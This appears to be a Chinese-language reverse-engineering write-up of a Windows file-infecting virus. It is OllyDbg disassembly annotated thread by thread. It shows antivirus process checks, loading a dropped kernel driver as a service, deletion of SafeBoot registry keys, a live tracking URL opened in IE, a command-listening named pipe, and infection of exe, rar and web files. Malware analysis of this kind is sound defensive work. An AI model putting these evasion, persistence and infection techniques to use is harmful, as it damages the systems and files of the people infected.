008758F7  |>  33C0          xor     eax, eax                         ;  启动线程A


线程A:
查找卡巴和Defender的进程,如果存在就试图躲避杀毒软件查杀,然后以标准方式加载驱动,执行后删除,并且删除了安全模式,最后创建了6个线程。

00871681  |> \6A 00         push    0                                ; /hTemplateFile = NULL
00871683  |.  68 80000000   push    80                               ; |Attributes = NORMAL
00871688  |.  FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |Mode
0087168E  |.  6A 00         push    0                                ; |pSecurity = NULL
00871690  |.  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00871692  |.  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00871697  |.  68 08938700   push    00879308                         ; |FileName = "C:\DelInfo.bin"
0087169C  |.  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008716A2  |.  8985 ECFEFFFF mov     dword ptr [ebp-114], eax         ;  打开文件C:\DelInfo,bin
008717BA  |.  6A 00         push    0                                ; /pOverlapped = NULL
008717BC  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
008717BF  |.  50            push    eax                              ; |pBytesRead
008717C0  |.  68 04010000   push    104                              ; |BytesToRead = 104 (260.)
008717C5  |.  8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
008717CB  |.  50            push    eax                              ; |Buffer
008717CC  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
008717D2  |.  FF15 EC908700 call    dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
008717D8  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /读取文件
008717DE  |.  FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00871812  |.  50            |push    eax                             ; /FileName
00871813  |.  FF15 18918700 |call    dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA
00871819  |.  83F8 01       |cmp     eax, 1                          ;  删除之前的loader
0087182A  |> \68 08938700   push    00879308                         ; /FileName = "C:\DelInfo.bin"
0087182F  |.  FF15 18918700 call    dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
00871835  |.  8B85 F0FEFFFF mov     eax, dword ptr [ebp-110]         ;  删除C:\DelInfo.bin
00871125  |.  6A 00         push    0                                ; /ProcessID = 0
00871127  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
00871129  |.  E8 627D0000   call    <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
0087112E  |.  8985 D0FEFFFF mov     dword ptr [ebp-130], eax
00871134  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
0087113A  |.  50            push    eax                              ; /lppe
0087113B  |.  FFB5 D0FEFFFF push    dword ptr [ebp-130]              ; |hSnapshot
00871141  |.  E8 3E7D0000   call    <jmp.&KERNEL32.Process32First>   ; \Process32First
00871146  |>  FF75 08       /push    dword ptr [ebp+8]               ; /String2
00871149  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]        ; |
0087114F  |.  50            |push    eax                             ; |String1
00871150  |.  FF15 F0908700 |call    dword ptr [<&KERNEL32.lstrcmpiA>; \lstrcmpiA
00871156  |.  85C0          |test    eax, eax                        ;  查找卡巴和Defender
00871158  |.  75 0E         |jnz     short 00871168
0087115A  |.  8B85 E0FEFFFF |mov     eax, dword ptr [ebp-120]
00871160  |.  8985 D4FEFFFF |mov     dword ptr [ebp-12C], eax
00871166  |.  EB 16         |jmp     short 0087117E
00871168  |>  8D85 D8FEFFFF |lea     eax, dword ptr [ebp-128]
0087116E  |.  50            |push    eax                             ; /lppe
0087116F  |.  FFB5 D0FEFFFF |push    dword ptr [ebp-130]             ; |hSnapshot
00871175  |.  E8 107D0000   |call    <jmp.&KERNEL32.Process32Next>   ; \Process32Next
0087117A  |.  85C0          |test    eax, eax
0087117C  |.^ 75 C8         \jnz     short 00871146
0087117E  |>  FFB5 D0FEFFFF push    dword ptr [ebp-130]              ; /hObject
00871184  |.  FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
008754D7   .  68 18D48700   push    0087D418                         ; /Buffer = appmgmts.0087D418
008754DC   .  68 04010000   push    104                              ; |BufSize = 104 (260.)
008754E1   .  FF15 4C918700 call    dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
008754E7   .  68 04010000   push    104                              ; /得到临时目录
008754FB   .  68 04010000   push    104                              ; /BufSize = 104 (260.)
00875500   .  68 20D58700   push    0087D520                         ; |Buffer = appmgmts.0087D520
00875505   .  FF15 B0908700 call    dword ptr [<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
0087550B   .  68 04010000   push    104                              ; /得到系统目录
00871536   .  50            push    eax                              ; /ProcNameOrOrdinal = "LoadResource"
00871537   .  68 F0928700   push    008792F0                         ; |/pModule = "kernel32.dll"
0087153C   .  FF15 04918700 call    dword ptr [<&KERNEL32.GetModuleH>; |\GetModuleHandleA
00871542   .  50            push    eax                              ; |hModule
00871543   .  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00871549   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  得到LoadResource地址
0087154C   .  68 00938700   push    00879300                         ; /ResourceType = "FILE"
00871551   .  0FB745 10     movzx   eax, word ptr [ebp+10]           ; |
00871555   .  50            push    eax                              ; |ResourceName
00871556   .  FF75 0C       push    dword ptr [ebp+C]                ; |hModule
00871559   .  FF15 C8908700 call    dword ptr [<&KERNEL32.FindResour>; \FindResourceA
0087155F   .  8945 E0       mov     dword ptr [ebp-20], eax          ;  查找资源
00871562   .  FF75 E0       push    dword ptr [ebp-20]               ; /hResource
00871565   .  FF75 0C       push    dword ptr [ebp+C]                ; |hModule
00871568   .  FF15 E8908700 call    dword ptr [<&KERNEL32.SizeofReso>; \SizeofResource
0087156E   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  得到资源大小
00871571   .  FF75 E0       push    dword ptr [ebp-20]
00871574   .  FF75 0C       push    dword ptr [ebp+C]
00871577   .  FF55 F8       call    dword ptr [ebp-8]                ;  kernel32.LoadResource
0087157A   .  8945 BC       mov     dword ptr [ebp-44], eax          ;  加载资源
008715D3   .  6A 00         push    0                                ; /hTemplateFile = NULL
008715D5   .  FF75 14       push    dword ptr [ebp+14]               ; |Attributes
008715D8   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
008715DA   .  6A 00         push    0                                ; |pSecurity = NULL
008715DC   .  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
008715DE   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
008715E3   .  FF75 08       push    dword ptr [ebp+8]                ; |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys"
008715E6   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008715EC   .  8945 E8       mov     dword ptr [ebp-18], eax          ;  创建C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
0087533A  |.  68 3F000F00   push    0F003F
0087533F  |.  6A 00         push    0
00875341  |.  6A 00         push    0
00875343  |.  FF15 18908700 call    dword ptr [<&ADVAPI32.OpenSCMana>;  advapi32.OpenSCManagerA
00875349  |.  8945 FC       mov     dword ptr [ebp-4], eax           ;  打开SCM
0087534C  |.  6A 00         push    0                                ; /Password = NULL
0087534E  |.  6A 00         push    0                                ; |ServiceStartName = NULL
00875350  |.  6A 00         push    0                                ; |pDependencies = NULL
00875352  |.  6A 00         push    0                                ; |pTagId = NULL
00875354  |.  6A 00         push    0                                ; |LoadOrderGroup = NULL
00875356  |.  FF75 08       push    dword ptr [ebp+8]                ; |BinaryPathName
00875359  |.  6A 01         push    1                                ; |ErrorControl = SERVICE_ERROR_NORMAL
0087535B  |.  6A 03         push    3                                ; |StartType = SERVICE_DEMAND_START
0087535D  |.  6A 01         push    1                                ; |ServiceType = SERVICE_KERNEL_DRIVER
0087535F  |.  68 FF010F00   push    0F01FF                           ; |DesiredAccess = SERVICE_ALL_ACCESS
00875364  |.  68 44988700   push    00879844                         ; |DisplayName = "Forter"
00875369  |.  68 44988700   push    00879844                         ; |ServiceName = "Forter"
0087536E  |.  FF75 FC       push    dword ptr [ebp-4]                ; |hManager
00875371  |.  FF15 20908700 call    dword ptr [<&ADVAPI32.CreateServ>; \CreateServiceA
00875377  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  创建服务
0087537A  |.  6A 00         push    0
0087537C  |.  6A 00         push    0
0087537E  |.  FF75 F8       push    dword ptr [ebp-8]
00875381  |.  FF15 24908700 call    dword ptr [<&ADVAPI32.StartServi>;  advapi32.StartServiceA
00875387  |.  FF75 F8       push    dword ptr [ebp-8]                ;  标准方式加载驱动
0087538A  |.  FF15 00908700 call    dword ptr [<&ADVAPI32.CloseServi>;  advapi32.CloseServiceHandle
00875390  |.  FF75 FC       push    dword ptr [ebp-4]
00875393  |.  FF15 00908700 call    dword ptr [<&ADVAPI32.CloseServi>;  advapi32.CloseServiceHandle
0087559E   .  50            push    eax
0087559F   .  68 02000080   push    80000002
008755A4   .  FF95 D0F6FFFF call    dword ptr [ebp-930]              ;  shlwapi.SHDeleteKeyA
008755AA   .  8D85 C0F4FFFF lea     eax, dword ptr [ebp-B40]         ;  删除SYSTEM\CurrentControlSet\Services子键
008755B0   .  50            push    eax                              ; /FileName
008755B1   .  FF15 18918700 call    dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
008755B7   .  68 04010000   push    104                              ; /删除C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
00871AA0  |.  50            push    eax                              ; /pHandle
00871AA1  |.  68 1F000200   push    2001F                            ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00871AA6  |.  6A 00         push    0                                ; |Reserved = 0
00871AA8  |.  8D85 78FBFFFF lea     eax, dword ptr [ebp-488]         ; |
00871AAE  |.  50            push    eax                              ; |Subkey
00871AAF  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
00871AB4  |.  FF15 0C908700 call    dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00871ABA  |.  6A 04         push    4                                ; /打开SYSTEM\CurrentControlSet\Services\LOADDLL
00871ABC  |.  8D45 10       lea     eax, dword ptr [ebp+10]          ; |
00871ABF  |.  50            push    eax                              ; |Buffer
00871AC0  |.  6A 04         push    4                                ; |ValueType = REG_DWORD
00871AC2  |.  6A 00         push    0                                ; |Reserved = 0
00871AC4  |.  68 80948700   push    00879480                         ; |ValueName = "Start"
00871AC9  |.  FF75 BC       push    dword ptr [ebp-44]               ; |hKey
00871ACC  |.  FF15 08908700 call    dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00871AD2  |.  FF75 BC       push    dword ptr [ebp-44]               ; /设置Start键值为2
00871AD5  |.  FF15 10908700 call    dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0087586E   > \6A 00         push    0                                ; /pThreadId = NULL
00875870   .  6A 00         push    0                                ; |CreationFlags = 0
00875872   .  6A 00         push    0                                ; |pThreadParm = NULL
00875874   .  68 63518700   push    00875163                         ; |ThreadFunction = appmgmts.00875163
00875879   .  6A 00         push    0                                ; |StackSize = 0
0087587B   .  6A 00         push    0                                ; |pSecurity = NULL
0087587D   .  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875883   .  6A 00         push    0                                ; /创建线程A1
00875885   .  6A 00         push    0                                ; |CreationFlags = 0
00875887   .  6A 00         push    0                                ; |pThreadParm = NULL
00875889   .  68 4A378700   push    0087374A                         ; |ThreadFunction = appmgmts.0087374A
0087588E   .  6A 00         push    0                                ; |StackSize = 0
00875890   .  6A 00         push    0                                ; |pSecurity = NULL
00875892   .  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875898   .  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]         ;  创建线程A2
0087694E  |.  6A 00         push    0                                ; /pThreadId = NULL
00876950  |.  6A 00         push    0                                ; |CreationFlags = 0
00876952  |.  6A 00         push    0                                ; |pThreadParm = NULL
00876954  |.  68 AB8C8700   push    00878CAB                         ; |ThreadFunction = appmgmts.00878CAB
00876959  |.  6A 00         push    0                                ; |StackSize = 0
0087695B  |.  6A 00         push    0                                ; |pSecurity = NULL
0087695D  |.  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00876963  |.  68 409B8700   push    00879B40                         ; /创建线程A3
00876968  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
0087696D  |.  FF15 F4918700 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876973  |.  68 749B8700   push    00879B74                         ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00876978  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
0087697D  |.  FF15 F4918700 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876983  |.  833D 50B58700>cmp     dword ptr [87B550], -1           ;  删除安全模式
00871C0B  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00871C10  |.  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
00871C16  |.  50            push    eax                              ; |PathBuffer
00871C17  |.  FF75 08       push    dword ptr [ebp+8]                ; |hModule
00871C1A  |.  FF15 00918700 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00871C20  |.  83A5 E0FEFFFF>and     dword ptr [ebp-120], 0           ;  获取加载自身的exe
00871C3F  |.  6A 00         |push    0                               ; /hTemplateFile = NULL
00871C41  |.  6A 00         |push    0                               ; |Attributes = 0
00871C43  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00871C45  |.  6A 00         |push    0                               ; |pSecurity = NULL
00871C47  |.  6A 01         |push    1                               ; |ShareMode = FILE_SHARE_READ
00871C49  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00871C4E  |.  8D85 E8FEFFFF |lea     eax, dword ptr [ebp-118]        ; |
00871C54  |.  50            |push    eax                             ; |FileName = "C:\tools\OllyICE\LOADDLL.EXE"
00871C55  |.  FF15 C4908700 |call    dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00871C5B  |.  8945 F4       |mov     dword ptr [ebp-C], eax          ;  打开exe
00871C70  |> \6A 00         push    0                                ; /pFileSizeHigh = NULL
00871C72  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00871C75  |.  FF15 24918700 call    dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00871C7B  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  获取文件大小
00871CEF  |.  6A 00         push    0                                ; /pOverlapped = NULL
00871CF1  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00871CF4  |.  50            push    eax                              ; |pBytesRead
00871CF5  |.  FF75 F8       push    dword ptr [ebp-8]                ; |BytesToRead
00871CF8  |.  FFB5 E4FEFFFF push    dword ptr [ebp-11C]              ; |Buffer
00871CFE  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00871D01  |.  FF15 EC908700 call    dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00871D07  |.  FF75 F4       push    dword ptr [ebp-C]                ; /读取文件
00876B05  |.  6A 00         push    0
00876B07  |.  6A 00         push    0
00876B09  |.  6A 00         push    0
00876B0B  |.  68 24638700   push    00876324
00876B10  |.  6A 00         push    0
00876B12  |.  6A 00         push    0
00876B14  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B17  |>  833D 84C68700>cmp     dword ptr [87C684], 0            ;  创建线程A4
00876B20  |.  6A 00         push    0
00876B22  |.  6A 00         push    0
00876B24  |.  6A 00         push    0
00876B26  |.  68 988A8700   push    00878A98
00876B2B  |.  6A 00         push    0
00876B2D  |.  6A 00         push    0
00876B2F  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B32  |>  833D 88C68700>cmp     dword ptr [87C688], 0            ;  创建线程A5
00876B3B  |.  6A 00         push    0
00876B3D  |.  6A 00         push    0
00876B3F  |.  6A 01         push    1
00876B41  |.  68 DC858700   push    008785DC
00876B46  |.  6A 00         push    0
00876B48  |.  6A 00         push    0
00876B4A  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B4D  |>  833D 8CC68700>cmp     dword ptr [87C68C], 0            ;  创建线程A6

线程A1:
用IE打开http://tj.nba1001.net:7777/tj/mac.html 10秒后关闭

00875224  |.  50            push    eax                              ; /pProcessInfo
00875225  |.  8D85 98F9FFFF lea     eax, dword ptr [ebp-668]         ; |
0087522B  |.  50            push    eax                              ; |pStartupInfo
0087522C  |.  6A 00         push    0                                ; |CurrentDir = NULL
0087522E  |.  6A 00         push    0                                ; |pEnvironment = NULL
00875230  |.  68 00000004   push    4000000                          ; |CreationFlags = CREATE_DEFAULT_ERROR_MODE
00875235  |.  6A 01         push    1                                ; |InheritHandles = TRUE
00875237  |.  6A 00         push    0                                ; |pThreadSecurity = NULL
00875239  |.  6A 00         push    0                                ; |pProcessSecurity = NULL
0087523B  |.  8D85 E0F9FFFF lea     eax, dword ptr [ebp-620]         ; |
00875241  |.  50            push    eax                              ; |CommandLine
00875242  |.  6A 00         push    0                                ; |ModuleFileName = NULL
00875244  |.  FF15 3C918700 call    dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA
0087524A  |.  83F8 01       cmp     eax, 1                           ;  用IE打开http://tj.nba1001.net:7777/tj/mac.html
0087524D  |. /75 31         jnz     short 00875280
0087524F  |. |FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /hObject
00875255  |. |FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0087525B  |. |68 10270000   push    2710                             ; /Timeout = 10000. ms
00875260  |. |FF15 E4908700 call    dword ptr [<&KERNEL32.Sleep>]    ; \Sleep
00875266  |. |6A 00         push    0                                ; /延时10秒
00875268  |. |FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |hProcess
0087526E  |. |FF15 B4908700 call    dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess
00875274  |. |FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; /关闭IE
0087527A  |. |FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle

线程A2:

00871B08  |.  50            push    eax                              ; /pWSAData
00871B09  |.  68 02020000   push    202                              ; |RequestedVersion = 202 (2.2.)
00871B0E  |.  FF15 44928700 call    dword ptr [<&WS2_32.#115>]       ; \WSAStartup
00871B14  |>  8D85 68FEFFFF /lea     eax, dword ptr [ebp-198]
00871B1A  |.  50            |push    eax
00871B1B  |.  6A 00         |push    0
00871B1D  |.  6A 00         |push    0
00871B1F  |.  68 88948700   |push    00879488                        ;  ASCII "www.baidu.com"
00871B24  |.  FF15 48928700 |call    dword ptr [<&WS2_32.getaddrinfo>;  ws2_32.getaddrinfo
00871B2A  |.  85C0          |test    eax, eax                        ;  打开百度,估计测试网络
00872D1D  |.  68 80958700   push    00879580                         ; /FileName = "Wininet.dll"
00872D22  |.  FF15 40918700 call    dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00872D28  |.  8945 F4       mov     dword ptr [ebp-C], eax           ;  加载wininet.dll
00872D2B  |.  68 8C958700   push    0087958C                         ; /ProcNameOrOrdinal = "InternetOpenA"
00872D30  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D33  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D39  |.  A3 4CDC8700   mov     dword ptr [87DC4C], eax
00872D3E  |.  68 9C958700   push    0087959C                         ; /ProcNameOrOrdinal = "InternetOpenUrlA"
00872D43  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D46  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D4C  |.  A3 50DC8700   mov     dword ptr [87DC50], eax
00872D51  |.  68 B0958700   push    008795B0                         ; /ProcNameOrOrdinal = "HttpQueryInfoA"
00872D56  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D59  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D5F  |.  A3 54DC8700   mov     dword ptr [87DC54], eax
00872D64  |.  68 C0958700   push    008795C0                         ; /ProcNameOrOrdinal = "InternetReadFileExA"
00872D69  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D6C  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D72  |.  A3 58DC8700   mov     dword ptr [87DC58], eax
00872D77  |.  68 D4958700   push    008795D4                         ; /ProcNameOrOrdinal = "InternetCloseHandle"
00872D7C  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D7F  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D85  |.  A3 5CDC8700   mov     dword ptr [87DC5C], eax
00872D8A  |.  68 E8958700   push    008795E8                         ; /ProcNameOrOrdinal = "InternetSetStatusCallback"
00872D8F  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D92  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D98  |.  A3 60DC8700   mov     dword ptr [87DC60], eax          ;  获取一系列函数地址
008727D9   > \8D85 70FEFFFF lea     eax, dword ptr [ebp-190]
008727DF   .  50            push    eax                              ; /pWSAData
008727E0   .  68 02020000   push    202                              ; |RequestedVersion = 202 (2.2.)
008727E5   .  FF15 44928700 call    dword ptr [<&WS2_32.#115>]       ; \WSAStartup
008727EB   >  8D85 5CFEFFFF lea     eax, dword ptr [ebp-1A4]
008727F1   .  50            push    eax
008727F2   .  6A 00         push    0
008727F4   .  6A 00         push    0
008727F6   .  68 44958700   push    00879544                         ;  ASCII "www.xunlei.com"
008727FB   .  FF15 48928700 call    dword ptr [<&WS2_32.getaddrinfo>>;  ws2_32.getaddrinfo
00872801   .  85C0          test    eax, eax                         ;  测试网络?
00872812   > \FFB5 5CFEFFFF push    dword ptr [ebp-1A4]
00872818   .  FF15 50928700 call    dword ptr [<&WS2_32.freeaddrinfo>;  ws2_32.freeaddrinfo
0087281E   .  6A 40         push    40                               ; /释放了...
0087283C   .  68 54958700   push    00879554                         ;  ASCII "www.3-0B6F-415d-B5C7-832F0.com"
00872841   .  FF15 48928700 call    dword ptr [<&WS2_32.getaddrinfo>>;  ws2_32.getaddrinfo
00872847   .  85C0          test    eax, eax                         ;  打开www.3-0B6F-415d-B5C7-832F0.com
0087285B   .  50            push    eax
0087285C   .  8D85 18FEFFFF lea     eax, dword ptr [ebp-1E8]
00872862   .  50            push    eax
00872863   .  6A 00         push    0
00872865   .  8B85 5CFEFFFF mov     eax, dword ptr [ebp-1A4]
0087286B   .  FF70 10       push    dword ptr [eax+10]
0087286E   .  8B85 5CFEFFFF mov     eax, dword ptr [ebp-1A4]
00872874   .  FF70 18       push    dword ptr [eax+18]
00872877   .  FF95 60FEFFFF call    dword ptr [ebp-1A0]              ;  ws2_32.WSAAddressToStringA
0087287D   .  FFB5 5CFEFFFF push    dword ptr [ebp-1A4]              ;  地址转换成字符串
00872883   .  FF15 50928700 call    dword ptr [<&WS2_32.freeaddrinfo>;  ws2_32.freeaddrinfo
0087380C  |> \6A 00         push    0                                ; /pThreadId = NULL
0087380E  |.  6A 00         push    0                                ; |CreationFlags = 0
00873810  |.  6A 00         push    0                                ; |pThreadParm = NULL
00873812  |.  68 88358700   push    00873588                         ; |ThreadFunction = appmgmts.00873588
00873817  |.  6A 00         push    0                                ; |StackSize = 0
00873819  |.  6A 00         push    0                                ; |pSecurity = NULL
0087381B  |.  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00873821  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  创建线程
00873841  |.  A3 68DC8700   mov     dword ptr [87DC68], eax
00873846  |>  FF35 E4B58700 push    dword ptr [87B5E4]               ; /Timeout = 900000. ms
0087384C  |.  FF35 68DC8700 push    dword ptr [87DC68]               ; |hObject = NULL
00873852  |.  FF15 50918700 call    dword ptr [<&KERNEL32.WaitForSin>; \WaitForSingleObject
00873858  |.  85C0          test    eax, eax                         ;  等待线程结束

线程A3:
创建命名管道[url=file://\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5]\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5[/url],听取命令。

00878CCC   .  6A 00         push    0                                ; /hTemplateFile = NULL
00878CCE   .  6A 00         push    0                                ; |Attributes = 0
00878CD0   .  6A 03         push    3                                ; |Mode = OPEN_EXISTING
00878CD2   .  6A 00         push    0                                ; |pSecurity = NULL
00878CD4   .  6A 00         push    0                                ; |ShareMode = 0
00878CD6   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878CDB   .  FF75 F4       push    dword ptr [ebp-C]                ; |FileName
00878CDE   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878CE4   .  8945 F0       mov     dword ptr [ebp-10], eax          ;  创建管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D1C   > \6A 00         push    0
00878D1E   .  6A 00         push    0
00878D20   .  68 00010000   push    100
00878D25   .  68 00010000   push    100
00878D2A   .  6A 01         push    1
00878D2C   .  6A 06         push    6
00878D2E   .  6A 03         push    3
00878D30   .  FF75 F4       push    dword ptr [ebp-C]                ;  appmgmts.00879AC0
00878D33   .  FF15 68908700 call    dword ptr [<&KERNEL32.CreateName>;  kernel32.CreateNamedPipeA
00878D39   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  创建命名管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D41   .  6A 00         push    0
00878D43   .  FF75 F8       push    dword ptr [ebp-8]
00878D46   .  FF15 78908700 call    dword ptr [<&KERNEL32.ConnectNam>;  kernel32.ConnectNamedPipe
00878D4C   .  6A 00         push    0                                ; /等待连接~

线程A4:
感染exe,rar,htm,html,asp,aspx文件


0876E17   > \6A 00         push    0                                ; /hTemplateFile = NULL
00876E19   .  68 80000000   push    80                               ; |Attributes = NORMAL
00876E1E   .  6A 03         push    3                                ; |Mode = OPEN_EXISTING
00876E20   .  6A 00         push    0                                ; |pSecurity = NULL
00876E22   .  6A 00         push    0                                ; |ShareMode = 0
00876E24   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00876E29   .  FF75 08       push    dword ptr [ebp+8]                ; |FileName
00876E2C   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00876E32   .  8945 98       mov     dword ptr [ebp-68], eax          ;  打开文件
00876E51   .  6A 02         push    2                                ; /Origin = FILE_END
00876E53   .  6A 00         push    0                                ; |pOffsetHi = NULL
00876E55   .  6A 00         push    0                                ; |OffsetLo = 0
00876E57   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
00876E5A   .  FF15 28918700 call    dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00876E60   .  8945 DC       mov     dword ptr [ebp-24], eax          ;  设置指针
00876E63   .  6A 00         push    0                                ; /MapName = NULL
00876E65   .  6A 00         push    0                                ; |MaximumSizeLow = 0
00876E67   .  6A 00         push    0                                ; |MaximumSizeHigh = 0
00876E69   .  6A 04         push    4                                ; |Protection = PAGE_READWRITE
00876E6B   .  6A 00         push    0                                ; |pSecurity = NULL
00876E6D   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
00876E70   .  FF15 74918700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileMappingA
00876E84   > \68 00040000   push    400                              ; /MapSize = 400 (1024.)
00876E89   .  6A 00         push    0                                ; |OffsetLow = 0
00876E8B   .  6A 00         push    0                                ; |OffsetHigh = 0
00876E8D   .  68 1F000F00   push    0F001F                           ; |AccessMode = F001F
00876E92   .  FF75 D0       push    dword ptr [ebp-30]               ; |hMapObject
00876E95   .  FF15 60918700 call    dword ptr [<&KERNEL32.MapViewOfF>; \MapViewOfFile
00876FB0   .  68 00040000   push    400                              ; /FlushSize = 400
00876FB5   .  FF75 D8       push    dword ptr [ebp-28]               ; |FlushBase
00876FB8   .  FF15 94908700 call    dword ptr [<&KERNEL32.FlushViewO>; \FlushViewOfFile
00877304   .  FF75 D8       push    dword ptr [ebp-28]               ; /BaseAddress
00877307   .  FF15 64918700 call    dword ptr [<&KERNEL32.UnmapViewO>; \UnmapViewOfFile
0087730D   .  FF75 D0       push    dword ptr [ebp-30]               ; /hObject
00877310   .  FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00877316   .  8365 D8 00    and     dword ptr [ebp-28], 0
0087731A   .  8365 D0 00    and     dword ptr [ebp-30], 0
0087731E   .  6A 02         push    2                                ; /Origin = FILE_END
00877320   .  6A 00         push    0                                ; |pOffsetHi = NULL
00877322   .  8B85 18FFFFFF mov     eax, dword ptr [ebp-E8]          ; |
00877328   .  0345 AC       add     eax, dword ptr [ebp-54]          ; |
0087732B   .  50            push    eax                              ; |OffsetLo
0087732C   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
0087732F   .  FF15 28918700 call    dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00877335   .  FF75 98       push    dword ptr [ebp-68]               ; /hFile
